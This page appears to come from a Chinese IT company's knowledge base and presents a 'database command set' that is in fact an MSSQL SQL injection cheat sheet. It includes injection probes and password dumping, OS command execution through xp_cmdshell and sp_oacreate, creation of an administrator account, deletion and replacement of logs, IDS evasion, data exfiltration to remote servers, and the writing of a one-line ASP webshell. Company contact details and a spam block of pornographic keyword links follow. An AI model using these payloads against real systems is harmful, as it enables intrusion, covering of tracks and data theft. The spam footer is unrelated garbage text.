久久精品A一国产成人免费网站-久久精品爱国产免费久久-久久精品操-久久精品成人免费看-国产一级毛片在线-国产一级免费片

 
您現在的位置:首頁 ? 知識庫 ? 系統集成 ? 數據庫維護 數據庫維護
數據庫命令集
發布日期:2018-04-04

and exists (select * from sysobjects) //判斷是否是MSSQL

and exists(select * from tableName) //判斷某表是否存在..tableName為表名

and 1=(select @@VERSION) //MSSQL版本

And 1=(select db_name()) //當前數據庫名

and 1=(select @@servername) //本地服務名

and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判斷是否是系統管理員

and 1=(Select IS_MEMBER('db_owner')) //判斷是否是庫權限

and 1= (Select HAS_DBACCESS('master')) //判斷是否有庫讀取權限

and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴庫名DBID為1,2,3....

;declare @d int //是否支持多行

and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') //判斷XP_CMDSHELL是否存在

and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread') //查看XP_regread擴展存儲過程是不是已經被刪除

添加和刪除一個SA權限的用戶test:(需要SA權限)

exec master.dbo.sp_addlogin test,password

exec master.dbo.sp_addsrvrolemember test,sysadmin

停掉或激活某個服務。 (需要SA權限)

exec master..xp_servicecontrol 'stop','schedule'

exec master..xp_servicecontrol 'start','schedule'

暴網站目錄

create table labeng(lala nvarchar(255), id int)

DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots','/',@result output insert into labeng(lala) values(@result);

and 1=(select top 1 lala from labeng) 或者and 1=(select count(*) from labeng where lala>1)

DOS下開3389 并修改端口號

sc config termservice start= auto

net start termservice

//允許外連

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f

//該3389端口到80

reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v PortNumber /t REG_DWORD /d 80 /f

SQL Server

判斷是否可注射:

http://www.targer.com/article.asp?id=6

http://www.targer.com/article.asp?id=6'

http://www.targer.com/article.asp?id=6 and 1=1

http://www.targer.com/article.asp?id=6 and 1=2

http://www.targer.com/article.asp?action=value' and 1=1

http://www.targer.com/article.asp?action=value' and 1=2

searchpoints%' and 1=1

searchpoints%' and 1=2

確定數據庫類型:

http://www.targer.com/article.asp?id=6 and user>0

http://www.targer.com/article.asp?id=6 and (select count(*) from sysobjects)>0

查詢當前用戶數據信息:

article.asp?id=6 having 1=1--

暴當前表中的列:

article.asp?id=6 group by admin.username having 1=1--

article.asp?id=6 group by admin.username,admin.password having 1=1--

暴任意表和列:

and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1

and (select top col_name(object_id('admin'),N) from sysobjects)>1

暴數據庫數據:

and (select top 1 password from admin where id=N)>1

修改數據庫中的數據:

;update admin set password='oooooo' where username='xxx'

增添數據庫中的數據:

;insert into admin values (xxx,oooooo)--

刪數據庫:

;drop database webdata

獲取當前數據庫用戶名:and user>0

獲取當前數據庫名:and db_name()>0

獲取數據庫版本:and (select @@version)>0

判斷是否支持多句查詢:;declare @a int--

判斷是否支持子查詢:and (select count(1) from [sysobjects])>=0

數據庫的擴展存儲過程:exec master..xp_cmdshell

查看服務器C盤目錄:;exec_master..xp_cmdshell 'dir c:'

判斷擴展存儲過程是否存在:and select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'

恢復擴展存儲過程:;exec sp_addextendedproc xp_cmdshell,'xplog70.dll'

刪除擴展存儲過程:;exec sp_dropextendedproc 'xp_cmdshell'

在MSSQL2000中提供了一些函數用于訪問OLE對象間接獲取權限:

;declare @s int

;exec sp_oacreat 'wscript.shell',@s

;exec master..spoamethod @s,'run',null,'cmd.exe/c dir c:'

判斷當前數據庫用戶名是否擁有比較高的權限:

and 1=(select is_srvrolemember('sysadmin'))

and 1=(select is_srvrolemember('serveradmin'))

and 1=(select is_srvrolemember('setupadmin'))

and 1=(select is_srvrolemember('securityadmin'))

and 1=(select is_srvrolemember('diskadmin'))

and 1=(select is_srvrolemember('bulkadmin'))

判斷當前數據庫用戶名是否為DB_OWNER:

and 1=(select is_member('db_owner'))

在SQLSERVER的master.dbo.sysdatabases表中存放著SQLSERVER數據庫系統中的所有數據庫信息,只需要PUBLIC權限就可以對此表進行SELECT操作:

and (select top 1 name from master.dbo.sysdatabase order by dbid)>0

and (select top 1 name from master.dbo.sysdatabase where name not in(select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid)>0

刪除日志記錄:

;exec master.dbo.xp_cmdshell 'del c:winntsystem32logfilesw3svc5ex070606.log >c: emp.txt'

替換日志記錄:

;exec master.dbo.xp_cmdshell 'copy c:winntsystem32logfilesw3svc5ex070404.log c:winntsystem32logfilesw3svc5ex070606.log >c: emp.txt'

獲取WEB路徑:

;declare @shell int

;exec master..sp_oamethod 'wscript.shell',@shell out

;exec master..sp_oamethod @shell,'run',null,'cmd.exe/c dir /s d:/index.asp >c:/log.txt

利用XP_CMDSHELL搜索:

;exec master..xp_cmdshell 'dir /s d:/index.asp'

顯示服務器網站配置信息命令:

cmd /c cscript.exe c:inetpubadminscriptadsutil.vbs enum w3svc/1/root

cmd /c cscript.exe c:inetpubadminscriptadsutil.vbs enum w3svc/2/root

利用XP_REGREAD可用PUBLIC權限讀取:

;exec master.dbo.xp_regread

hkey_local_machine,

'systemcurrentcontrolsetservicesw3svcparameters irtual roots'

'/'

SQLSERVER下的高級技術可以參考閱讀曾云好所著的精通腳本黑客第五章。

3、DSqlHelper

檢測權限SYSADMIN:

and 1=(select IS_SRVROLEMEMBER('sysadmin'))

serveradmin、setupadmin、securityadmin、diskadmin、bulkadmin、db_owner。

檢測XP_CMDSHELL(CMD命令):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_cmdshell')

檢測XP_REGREAD(注冊表讀取功能):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_regread')

檢測SP_MAKEWEBTASK(備份功能):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_makewebtask')

檢測SP_ADDEXTENDEDPROC:

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_addextendedproc')

檢測XP_SUBDIRS讀子目錄:

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_subdirs')

檢測XP_DIRTREE讀子目錄:

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_dirtree')

修改內容:

; UPDATE 表名 set 字段=內容 where 1=1

XP_CMDSHELL檢測:

;exec master..xp_cmdshell 'dir c:'

修復XP_CMDSHELL:

;exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'

用XP_CMDSHELL添加用戶hacker:

;exec master.dbo.xp_cmdshell 'net user hacker 123456 /add'

XP_CMDSHELL把用戶hacker加到ADMIN組:

;exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'

創建表test:

;create table [dbo].[test] ([dstr][char](255));

檢測表段test:

and exists (select * from test)

讀取WEB的位置(讀注冊表):

;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots', '/',@result output insert into test (dstr) values(@result);--

爆出WEB的絕對路徑(顯錯模式):

and 1=(select count(*) from test where dstr > 1)

刪除表test:

;drop table test;--

創建查看目錄的表dirs:

;create table dirs(paths varchar(100), id int)

把查看目錄的內容加入表dirs:

;insert dirs exec master.dbo.xp_dirtree 'c:'

爆目錄的內容dirs:

and 0<>(select top 1 paths from dirs)

備份數據庫DATANAME:

declare @a sysname; set @a=db_name();backup DATANAME @a to disk='c:inetpubwwwrootdown.bak';--

刪除表dirs:

;drop table dirs;--

創建表temp:

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

把驅動盤列表加入temp表:

;insert temp exec master.dbo.xp_availablemedia;--

刪除表temp:

;delete from temp;--

創建表dirs:

;create table dirs(paths varchar(100), id int);--

獲得子目錄列表XP_SUBDIRS:

;insert dirs exec master.dbo.xp_subdirs 'c:';--

爆出內容(顯錯模式):

and 0<>(select top 1 paths from dirs)

刪除表dirs:

;delete from dirs;--

創建表dirs:

;create table dirs(paths varchar(100), id int)--

用XP_CMDSHELL查看目錄內容:

;insert dirs exec master..xp_cmdshell 'dir c:'

刪除表dirs:

;delete from dirs;--

檢測SP_OAcreate(執行命令):

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'SP_OAcreate')

SP_OAcreate執行CMD命令:

;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:windowssystem32cmd.exe /c net user hacker 123456 /add'

SP_OAcreate建目錄:

;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:windowssystem32cmd.exe /c md E:XkCmsVwebFormI1'

創建一個虛擬目錄E盤:

;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:inetpubwwwrootmkwebdir.vbs -w "默認 Web 站點" -v "e","e:"'

設置虛擬目錄E為可讀:

;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:inetpubwwwrootchaccess.vbs -a w3svc/1/ROOT/e +browse'

啟動SERVER服務:

;exec master..xp_servicecontrol 'start', 'server'

繞過IDS檢測XP_CMDSHELL:

;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:'

開啟遠程數據庫1:

; select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1' )

開啟遠程數據庫2:

;select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table'

//看看是什么權限的

and 1=(Select IS_MEMBER('db_owner'))

And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//檢測是否有讀取某數據庫的權限

and 1= (Select HAS_DBACCESS('master'))

And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

數字類型

and char(124)%2Buser%2Bchar(124)=0

字符類型

' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索類型

' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用戶名

and user>0

' and user>0 and ''='

檢測是否為SA權限

and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

檢測是不是MSSQL數據庫

and exists (select * from sysobjects);--

檢測是否支持多行

;declare @d int;--

恢復 xp_cmdshell

;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------

// 執行命令

//-----------------------

首先開啟沙盤模式:

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet.0Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb執行系統命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:winntsystem32iasias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

執行命令

;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:WINNTsystem32cmd.exe /c net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:I1'

判斷xp_cmdshell擴展存儲過程是否存在:

http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

寫注冊表

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet.0Engines','SandBoxMode','REG_DWORD',1

REG_SZ

讀注冊表

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon','Userinit'

讀取目錄內容

exec master..xp_dirtree 'c:winntsystem32',1,1

數據庫備份

backup database pubs to disk = 'c:S.bak'

//爆出長度

And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

更改sa口令方法:用sql綜合利用工具連接后,執行命令:

exec sp_password NULL,'新密碼','sa'

添加和刪除一個SA權限的用戶test:

exec master.dbo.sp_addlogin test,ptlove

exec master.dbo.sp_addsrvrolemember test,sysadmin

刪除擴展存儲過過程xp_cmdshell的語句:

exec sp_dropextendedproc 'xp_cmdshell'

添加擴展存儲過過程

EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:winntsystem32sqllog.dll'

GRANT exec On xp_proxiedadata TO public

停掉或激活某個服務。

exec master..xp_servicecontrol 'stop','schedule'

exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某個目錄下的子目錄。

xp_getfiledetails 'C:InetpubwwwrootSQLInjectlogin.asp'

dbo.xp_makecab

將目標多個檔案壓縮到某個目標檔案之內。

所有要壓縮的檔案都可以接在參數列的最后方,以逗號隔開。

dbo.xp_makecab

'c: est.cab','mszip',1,

'C:InetpubwwwrootSQLInjectlogin.asp',

'C:InetpubwwwrootSQLInjectsecurelogin.asp'

xp_terminate_process

停掉某個執行中的程序,但賦予的參數是 Process ID。

利用”工作管理員”,透過選單「檢視」-「選擇字段」勾選 pid,就可以看到每個執行程序的 Process ID

xp_terminate_process 2484

xp_unpackcab

解開壓縮檔。

xp_unpackcab 'c: est.cab','c: emp',1

某機,安裝了radmin,密碼被修改了,regedit.exe不知道被刪除了還是被改名了,net.exe不存在,沒有辦法使用regedit /e 導入注冊文件,但是mssql是sa權限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEMRAdmin 2.0ServerParameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密碼為12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEMRAdmin 2.0ServerParameters','port','REG_BINARY',0xd20400 則端口值改為1234

create database lcx;

Create TABLE ku(name nvarchar(256) null);

Create TABLE biao(id int NULL,name nvarchar(256) null);

//得到數據庫名

insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

//在Master中創建表,看看權限怎樣

Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目錄里寫入一句話馬:

http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:www t88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

//更新表內容

Update films SET kind = 'Dramatic' Where id = 123

//刪除內容

delete from table_name where Stockid = 3

  • 1.公司登記注冊于2003年1月27日,清遠市桑達電子網絡媒體有限公司
    2.公司2006年起成為清遠市政府定點協議供貨商,電子采購供貨商
    3.公司2007年被清遠市相關政府部門評為安防行業狀元
    4.公司2007年起成為長城電腦清遠如意服務站(SP368)
    5.公司2007年承建清遠市橫河路口電子警察工程,開創清遠電子警察先河。
  • 6.公司2007年起成為IBM合作伙伴、公司2010年底成為金蝶軟件清遠金牌代理(伙伴編號:30030013)
    7.公司組團隊參加南方都市報組織的創富評選,獲廣東80強。公司申請多項軟件著作權、專利權
    8.2016年起公司成為粵東西北地區為數不多的雙軟企業,確立“讓軟件驅動世界,讓智能改變生活!"企業理想
    9.2016-01-29更名為廣東互動電子網絡媒體有限公司
    10.2021-01-13更名為廣東互動電子有限公司
  • 投資合作咨詢熱線電話:0763-3391888 3323588
  • 做一個負責任的百年企業! 天行健,君子以自強不息;地勢坤,君子以厚德載物;
    為用戶創造價值! 讓軟件驅動世界; 讓智能改變生活; 超越顧客期望,幫助顧客成功;
    對客戶負責,對員工負責,對企業命運負責!幫助支持公司的客戶成功;幫助忠誠于公司的員工成功!
  • 聯系電話:0763-3391888 3323588 3318977
    服務熱線:18023314222 QQ:529623964
  • 工作QQ:2501204690 商務QQ: 602045550
    投資及業務投訴QQ: 529623964
    微信:小米哥 微信號:qysed3391888
    騰訊微博:桑達網絡-基石與起點
  • E-MAIL:222#QYSED.CN ok3391888#163.com (請用@替換#)
在線客服
  • 系統集成咨詢
    點擊這里給我發消息
  • 網站\微信\軟件咨詢
    點擊這里給我發消息
  • 售后服務
    點擊這里給我發消息
  • 投資合作
    點擊這里給我發消息
床震吃胸膜奶免费视频| 性国产VIDEOFREE高清| 波多野结衣AV电影在线观看| 欧美丰满美乳XXⅩ高潮www| 自拍偷自拍亚洲精品情侣| 鲁鲁网亚洲站内射污| 一面膜上边一面膜下边日本| 久久久久久午夜成人影院| 麻豆精品传媒卡一卡二老狼| 亚洲中文字幕码在线电影| 久久国产欧美成人网站| 亚洲色爱图小说专区| 久久精品国产99久久无毒不卡| 亚洲日韩电影久久| 久久AV无码精品人妻糸列| 亚洲性无码AV中文字幕| 久久天天躁狠狠躁夜夜2020| 一区二区三区中文字幕| 老奶奶BGMBGM人与自然 | 坐公交忘穿内裤被挺进老 | 班长哭着说不能再C了视频| 人人人人人人一摸| 成人免费视频在线观看| 视频在线一区二区三区| 国产成人无码AV一区二区在线观 | 狠狠色噜噜狠狠狠777米奇| 亚洲成A人片在线播放| 精品成人一区二区三区四区| 亚洲色偷无码一区二区| 国产精品国产AV片国产| 无码人妻丝袜视频在线播免费| 国产亚洲欧美日韩亚洲中文色| 亚洲AV综合色区无码一区爱AV | 奇米综合四色77777久久| 菠萝蜜视频网在线WWW| 少妇邻居内射在线| 国产精品人人妻人色五月| 亚洲AV无码乱码在线观看代蜜桃| 精品精品国产欧美在线| 一二三四在线观看免费高清视频| 男男GAY腐片GⅤ2022| А√天堂中文最新版在线种子| 色偷偷人人澡久久超碰97| 公车上拨开丁字裤进入电影| 日本人妻丰满熟妇久久久久久不卡| 岛国精品一区免费视频在线| 污污内射久久一区二区欧美日韩| 国产综合AV一区二区三区无码| 亚洲精品国产美女久久久99| 好男人WWW在线观看视频| 亚洲午夜精品久久久久久浪潮| 免费中文熟妇在线影片密芽| 班长哭了能不能再抠游戏里面的钱| 天空影院手机免费观看在线| 好深好大再浪一点| 一本一道波多野结衣AV中文| 啪啪叉叉xx高清无码| 丰满老师少妇久久久久久1| 亚欧成人无码AV在线播放| 久久久久久国产精品免费无码| AV大片在线无码免费| 色哟哟在线视频精品一区| 国内精品久久久久精品爽爽 | 他的白月光H1∨1笔趣阁| 国偷自产一区二区免费视频| 亚洲AV无码日韩精品影片| 久久久久亚洲AV成人片一区| HENNESSY女RAPPER| 图片 小说 校园 激情 都市| 精品欧洲AV无码一区二区男男| 23部禽女乱小说内| 少妇短裙公车被直接进入| 狠狠综合久久AV一区二区| 26UUU另类亚洲欧美日本| 熟妇av一区二区| 久草玖玖玖爱在线资源| JZZIJZZIJ亚洲成熟少妇| 无码人妻一区二区中文| 久久一日本道色综合久久| 2018最新国产好看的国产| 色哟哟精品网站在线观看| 精品国产A∨无码一区二区三区 | 国产精品无码一区二区三区电影| 亚洲中文字幕无码永久| 日本三级韩国三级欧美三级| 海角精产国品一二三区别| 最新永久无码AV网址亚洲| 天天爽夜夜爽夜夜爽| 久久久久 亚洲 无码 AV 专 | 精品乱人伦一区二区三区| H国产小视频福利免费视频| 无遮挡粉嫩小泬女视频| 饥渴人妻被快递员玩弄的视频| 18禁又污又黄又爽的网站不卡| 婷婷97狠狠色综合| 久久人人爽人人人人片AV| 粗大黑人巨茎大战欧美成人 | 色噜噜AV男人的天堂| 精品久久久99大香线蕉| 白白嫩嫩又小又紧| 亚洲精品国产A久久久久久| 人妻洗澡被强公日日澡| 娇小性XXXX摘花HD| 2023国产精品一卡2卡三卡| 玩弄丰满奶水的女邻居| 麻豆一区区三区四区产品麻豆| ぱらだいす天堂中文网.WWW | 2021精品亚洲中文字幕| 无码中文精品专区一区二区| 久久ER99热精品一区二区| 成人无码免费视频在线观看网址 | AV鲁丝一区鲁丝二区鲁丝三区 | 欧美午夜性春猛交ⅩXXX| 国产在线内射婷婷| www.丁香五月| 亚洲乱码日产精品BD在观看| 日韩A片无码一区二区五区电影| 国产婷婷丁香五月缴情成人网| 亚洲中文成人中文字幕| 少妇人妻无码专区视频免费| 老外粗猛长爽的视频| 国产高潮流白浆喷水在线观看| 亚洲熟妇AV不卡一区二区三区| 色欲aⅴ精品一区二区三区浪潮| 久久中文字幕无码中文字幕有码| 国产精彩乱子真实视频| 9I国产麻豆国产AV旗袍| 无码专区亚洲综合另类| 欧美精品色婷婷五月综合 | 亚洲色无码国产精品网站可下载 | 黑料传送门TTTZZZ07DU| 超碰人人爽天天爽天天做| 一本一道VS无码中文字幕| 无码少妇一区二区三区视频| 欧美性大战久久久久久久| 久久国产劲爆∧V内射| 国产高清不卡一区二区| JLZZ大全高潮多水| 一本大道香蕉在线资源| 亚A∨国AV综AV涩涩涩| 揉着我的奶从后面进去| 免费精品一区二区三区第35| 精产国品一二三产品在哪| 国产AV一区二区精品凹凸| 99久久国产综合精品成人影院| 亚洲日韩电影久久| 香蕉久久AV一区二区三区APP| 女人被暴躁C到高潮容易怀孕| 精品国产亚洲一区二区三区在线观| 观看国产色欲色欲色欲WWW| 4399理论片午午伦夜理片| 亚洲人成色77777| 午夜无码一区二区三区在线| 日韩无码一区视频| 久久香综合精品久久伊人| 国产午夜精品理论片| 公交车里抓着摇曳的手环诗情| JAPANESE熟女熟妇| 孕妇滴着奶水做着爱A| 亚洲国产精品无码久久久秋霞1 | 亚洲午夜无码毛片av| 小东西好几天没弄了还能吃吗| 肉丝超薄少妇一区二区三区| 欧美黑人性暴力猛交喷水黑人巨大| 久久精品影视免费观看| 和岳每晚弄的高潮嗷嗷叫| 国产精品无码久久久久久| 粗一硬一长一进一爽一A级| HEYZO中文字幕无码| 1000部又爽又黄无遮挡的视频| 一本大道在线无码一区| 亚洲精品国产AⅤ成拍色拍| 新版孕妇BBWBBW| 天天爽夜夜爽人人爽QC| 日日摸日日碰人妻无码老牲| 青青青国产手线观看视频2019| 久久久精品中文字幕乱码18| 好紧我太爽了视频免费| 国产美女精品一区二区三区| 把腿张开老子cao烂你在线视频| 607080岁奶奶| 中文AV无码人妻一区二区三区 | 欧美FREESEX呦交| 美女啪啪网站又黄又免费| 久久久久亚洲AV无码尤物黑人| 精品国产成人一区二区| 韩国精品一区二区三区无码视频| 国产日产欧美最新| 厨房挺人ⅩXXX猛交| 拔萝卜在线视频免费观看| HEYZO高清中文字幕在线| AV无码免费无禁网站| 99精品欧美一区二区三区| 18VIDEOSEX性欧美| 中文字幕AV无码一区二区三区电| 呦小BBW搡BBBB搡BBBB| 一二三四免费观看在线电影二| 一本一道VS无码中文字幕| 一本无码人妻在中文字幕| 野花在线高清视频|